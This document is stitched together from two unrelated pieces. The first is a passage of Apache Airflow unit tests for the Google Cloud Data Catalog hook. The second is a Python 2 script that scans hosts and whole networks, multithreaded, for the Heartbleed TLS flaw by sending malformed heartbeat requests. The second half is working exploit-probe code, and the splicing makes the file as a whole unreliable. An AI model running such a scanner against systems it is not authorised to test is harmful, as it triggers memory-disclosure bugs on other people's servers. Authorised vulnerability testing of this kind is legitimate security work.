timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_tag_template.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.list_tags(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
page_size=TEST_PAGE_SIZE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2), page_size=TEST_PAGE_SIZE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2))
mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
result = self.hook.get_tag_for_template_name(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2), page_size=100),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
assert result == tag_2
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.rename_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.rename_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2),
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_entry(
entry=TEST_ENTRY,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_entry.assert_called_once_with(
request=dict(
entry=Entry(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)), update_mask=TEST_UPDATE_MASK
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag(
tag=deepcopy(TEST_TAG),
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag_id=TEST_TAG_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag.assert_called_once_with(
request=dict(tag=Tag(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_2)), update_mask=TEST_UPDATE_MASK),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template(
tag_template=TEST_TAG_TEMPLATE,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template.assert_called_once_with(
request=dict(
tag_template=TagTemplate(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template_field(
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
tag_template=TEST_TAG_TEMPLATE_ID,
location=TEST_LOCATION,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2),
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
TEST_MESSAGE = re.escape(
"The project id must be passed either as keyword project_id parameter or as project_id extra in "
"Google Cloud connection definition. Both are not set!"
)
class TestCloudDataCatalogMissingProjectIdHook(TestCase):
def setUp(
self,
) -> None:
with mock.patch(
"airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
new=mock_base_gcp_hook_no_default_project_id,
):
self.hook = CloudDataCatalogHook(gcp_conn_id="test")
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
entry=TEST_ENTRY,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_entry_group(
location=TEST_LOCATION,
entry_group_id=TEST_ENTRY_GROUP_ID,
entry_group=TEST_ENTRY_GROUP,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=deepcopy(TEST_TAG),
template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=Tag(),
template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_tag_template(
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.create_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.delete_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.delete_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.delete_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=TEST_TAG_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.delete_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
force=TEST_FORCE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.delete_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
force=TEST_FORCE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.get_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.get_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
read_mask=TEST_READ_MASK,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.get_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.list_tags(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
page_size=TEST_PAGE_SIZE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2))
mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.get_tag_for_template_name(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.rename_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.update_entry(
entry=TEST_ENTRY,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.update_tag(
tag=deepcopy(TEST_TAG),
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag_id=TEST_TAG_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.update_tag_template(
tag_template=TEST_TAG_TEMPLATE,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
with pytest.raises(AirflowException, match=TEST_MESSAGE):
self.hook.update_tag_template_field(
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
tag_template=TEST_TAG_TEMPLATE_ID,
location=TEST_LOCATION,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
| |
#!/usr/bin/env python
# Single-host usage example: python ssltest.py example.com
# To see all options for multiple hosts and multi-threading: python ssltest.py --help
import sys
import struct
import socket
import time
import select
import re
import threading
import netaddr
import json
import os
import datetime
import signal
from optparse import OptionParser
from collections import defaultdict
from multiprocessing.dummy import Pool
host_status = {}
hosts_to_skip = []
counter = defaultdict(int)
lock = threading.Lock()
options = OptionParser(usage='%prog <network> [network2] [network3] ...', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains')
options.add_option('--port', '-p', dest="port", default=443, help="Port to scan on all hosts or networks, default 443")
options.add_option('--input', '-i', dest="input_file", default=[], action="append", help="Optional input file of networks or ip addresses, one address per line")
options.add_option('--logfile', '-o', dest="log_file", default="results.txt", help="Optional logfile destination")
options.add_option('--resume', dest="resume", action="store_true", default=False, help="Do not rescan hosts that are already in the logfile")
options.add_option('--timeout', '-t', dest="timeout", default=5, help="How long to wait for remote host to respond before timing out")
options.add_option('--threads', dest="threads", default=100, help="If specific, run X concurrent threads")
options.add_option('--json', dest="json_file", default=None, help="Save data as json into this file")
options.add_option('--only-vulnerable', dest="only_vulnerable", action="store_true", default=False, help="Only scan hosts that have been scanned before and were vulnerable")
options.add_option('--only-unscanned', dest="only_unscanned", action="store_true", default=False, help="Only scan hosts that appear in the json file but have not been scanned")
options.add_option('--summary', dest="summary", action="store_true", default=False, help="Useful with --json. Don't scan, just print old results")
options.add_option('--verbose', dest="verbose", action="store_true", default=False, help="Print verbose information to screen")
options.add_option('--max', dest="max", default=None, help="Exit program after scanning X hosts. Useful with --only-unscanned")
opts, args = options.parse_args()
threadpool = Pool(processes=int(opts.threads))
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 03 00 dc 01 00 00 d8 03 03 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
try:
data = s.recv(remain)
except Exception, e:
return None
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
return None, None, None
return typ, ver, pay
def hit_hb(s):
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return False
if typ == 24:
return True
if typ == 21:
return False
def unpack_handshake(pay):
"""
Unpack the SSL handshake in Multiple Handshake Message
"""
paylen = len(pay)
offset = 0
payarr = []
while offset < paylen:
h = pay[offset:offset + 4]
t, l24 = struct.unpack('>B3s', h)
l = struct.unpack('>I', '\x00' + l24)[0]
payarr.append((
t,
l,
pay[offset+4:offset+4+l]
))
offset = offset+l+4
return payarr
def is_vulnerable(host, timeout, port=443):
""" Check if remote host is vulnerable to heartbleed
Returns:
None -- If remote host has no ssl
False -- Remote host has ssl but likely not vulnerable
True -- Remote host might be vulnerable
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(int(timeout))
try:
s.connect((host, int(port)))
except Exception, e:
return None
s.send(hello)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return None
if typ == 22:
payarr = unpack_handshake(pay)
# Look for server hello done message.
finddone = [t for t, l, p in payarr if t == 14]
if len(finddone) > 0:
break
# construct heartbeat request packet
ver_chr = chr(ver&0xff)
hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381
hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00")
s.send(hb)
return hit_hb(s)
def store_results(host_name, current_status):
current_time = time.time()
with lock:
counter[current_status] += 1
counter["Total"] += 1
if host_name not in host_status:
host_status[host_name] = {}
host = host_status[host_name]
# Make a note when this host was last scanned
host['last_scan'] = current_time
# Make a note if this host has never been scanned before
if 'first_scan' not in host:
host['first_scan'] = current_time
elif host.get('status', 'never been scanned') != current_status:
# If it has a different check result from before
host['changelog'] = host.get('changelog', [])
changelog_entry = [current_time, current_status]
host['changelog'].append(changelog_entry)
host['status'] = current_status
with open(opts.log_file, 'a') as f:
message = "{current_time} {host} {current_status}".format(**locals())
f.write(message + "\n")
return message
def scan_host(host):
""" Scans a single host, logs into
Returns:
list(timestamp, ipaddress, vulnerabilitystatus)
"""
if opts.max and int(opts.max) >= counter["Total"]:
return
host = str(host)
if host in hosts_to_skip:
return
result = is_vulnerable(host, opts.timeout, opts.port)
message = store_results(host, result)
if opts.verbose:
print message
return message
def scan_hostlist(hostlist, threads=5):
""" Iterates through hostlist and scans them
Arguments:
hostlist -- Iterable with ip addresses
threads -- If specified, run in multithreading mode
"""
task = threadpool.map_async(scan_host, hostlist)
while True:
print counter['Total'], "hosts done"
task.wait(1)
if task.ready() or hasattr(threadpool, 'done'):
return
threadpool.close()
threadpool.join()
def clean_hostlist(args):
""" Returns list of iterables
Examples:
>>> hostlist = ["127.0.0.1", "127.0.0.2"]
>>> clean_hostlist(hostlist)
"""
hosts = []
networks = []
for i in args:
# If it contains any alphanumerics, it might be a domain name
if any(c.isalpha() for c in i):
# Special hack, because alexa top x list is kind of weird
i = i.split('/')[0]
hosts.append(i)
# If arg contains a / we assume its a network name
elif '/' in i:
networks.append(netaddr.IPNetwork(i))
else:
hosts.append(i)
result = []
for network in networks:
if network.size >= opts.threads:
result.append(network)
else:
for i in network:
hosts.append(str(i))
if hosts:
result.append(hosts)
return result
def import_json(filename):
""" Reads heartbleed data in json format from this file """
with open(filename) as f:
json_data = f.read()
data = json.loads(json_data)
for k, v in data.items():
host_status[k] = v
def export_json(filename):
""" Save scan results into filename as json data
"""
json_data = json.dumps(host_status, indent=4)
with open(filename, 'w') as f:
f.write(json_data)
def print_summary():
""" Print summary of previously stored json data to screen """
if not opts.json_file:
pass
#options.error("You need to provide --json with --summary")
else:
import_json(opts.json_file)
counter = defaultdict(int)
for host, data in host_status.items():
friendly_status = "unknown"
status = data.get('status', "Not scanned")
if status is None:
friendly_status = "SSL Connection Failed"
elif status is True:
friendly_status = "Vulnerable"
elif status is False:
friendly_status = "Not Vulnerable"
else:
friendly_status = str(status)
last_scan = int(float(data.get('last_scan',0)))
last_scan = datetime.datetime.fromtimestamp(last_scan).strftime('%Y-%m-%d %H:%M:%S')
counter[friendly_status] += 1
counter['Total'] += 1
if opts.only_vulnerable and not status:
continue
elif opts.only_unscanned and 'status' in data:
continue
print "%s %-20s %5s" % (last_scan, host, friendly_status)
print "------------ summary -----------"
for k,v in counter.items():
print "%-7s %s" % (v, k)
return
def signal_handler(signal, frame):
print "Ctrl+C pressed.. aborting..."
threadpool.terminate()
threadpool.done = True
def main():
if opts.summary:
print_summary()
return
